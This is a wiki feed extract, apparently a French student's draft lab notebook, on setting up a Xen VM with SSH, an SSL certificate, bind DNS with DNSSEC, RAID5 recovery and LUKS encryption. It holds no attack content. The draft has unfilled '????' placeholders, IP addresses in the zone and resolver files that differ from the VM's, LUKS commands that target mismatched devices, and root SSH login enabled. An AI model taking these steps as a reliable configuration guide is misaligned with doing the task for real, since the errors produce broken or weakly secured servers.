    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46214</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46214"/>
				<updated>2017-11-13T12:46:27Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* DNS SEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
